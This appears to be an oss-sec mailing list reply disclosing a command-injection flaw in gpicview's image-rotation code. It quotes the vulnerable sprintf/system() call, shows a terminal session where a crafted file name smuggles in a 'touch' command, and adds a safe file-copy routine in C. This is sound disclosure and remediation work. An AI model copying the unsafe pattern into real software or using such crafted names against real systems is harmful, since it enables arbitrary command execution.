oss-sec mailing list archives
Re: CVE Request (gpicview)
From: Robert Buchholz <rbu () gentoo org>
Date: Wed, 3 Sep 2008 01:59:47 +0200
On Sunday 31 August 2008, Nico Golde wrote:
> Same piece of code main-win.c doesn't look too trustworthy to me either:
>
>     int error = jpegtran (filename, "/tmp/rot.jpg" , code);
>     if(error)
>         return error;
>
>     //now copy /tmp/rot.jpg back to the original file
>     char command[strlen(filename)+50]; //this should not generate buffer owerflow
>     // MS: didn't know, how to make it better, maybe an own copy routine
>     sprintf(command,"cp /tmp/rot.jpg \"%s\"",filename);
>     system(command);
>
> Anyone played with crafted file names?
Good catch! You need to append '.jpg' at the end of the crafted filename so the rotation via jpegtran is invoked, but besides that it works ok:

rbu@peanut ~/devel/gentoo/security/gpicview $ ls -l
total 484K
-rw------- 1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg
rbu@peanut ~/devel/gentoo/security/gpicview $ gpicview *
QSettings: failed to open file '/usr/qt/3/etc/settings/qt_plugins_3.3rc'
sh: .jpg: command not found
^C
rbu@peanut ~/devel/gentoo/security/gpicview $ ls -l
total 960K
-rw------- 1 rbu rbu 469K 2008-09-03 01:52 bla.jpg
-rw------- 1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg
-rw------- 1 rbu rbu 0 2008-09-03 01:52 XX

Robert
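The copy-back step from the quoted main-win.c snippet, done with "an own copy routine" instead of system(), as an added example that is not part of the original post or of gpicview's code. The names copy_file and write_all are hypothetical; the point is that the file name never reaches a shell, so a name like the one in the transcript above is only a path.

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Write the whole buffer, retrying after short writes and EINTR. */
static int write_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = write(fd, buf, len);
        if (n < 0 && errno != EINTR)
            return -1;
        if (n > 0) {
            buf += n;
            len -= (size_t)n;
        }
    }
    return 0;
}

/* Hypothetical helper (added example, not gpicview code): copy src over dst.
 * Both names go straight to open(2), so quotes, semicolons and spaces in
 * them are path bytes, never shell syntax. Returns 0 on success, -1 on error. */
int copy_file(const char *src, const char *dst)
{
    char buf[8192];
    ssize_t n;
    int in, out, rc = -1;
    if ((in = open(src, O_RDONLY)) < 0)
        return -1;
    if ((out = open(dst, O_WRONLY | O_CREAT | O_TRUNC, 0600)) < 0) {
        close(in);
        return -1;
    }
    while ((n = read(in, buf, sizeof buf)) > 0)
        if (write_all(out, buf, (size_t)n) < 0)
            break;
    if (n == 0)
        rc = 0;                 /* reached EOF with every chunk written */
    close(in);
    if (close(out) < 0)
        rc = -1;                /* a deferred write error surfaces here */
    return rc;
}

/* Usage: ./copy /path/to/rotated.jpg "original name.jpg" */
int main(int argc, char **argv)
{
    return (argc == 3 && copy_file(argv[1], argv[2]) == 0) ? 0 : 1;
}
```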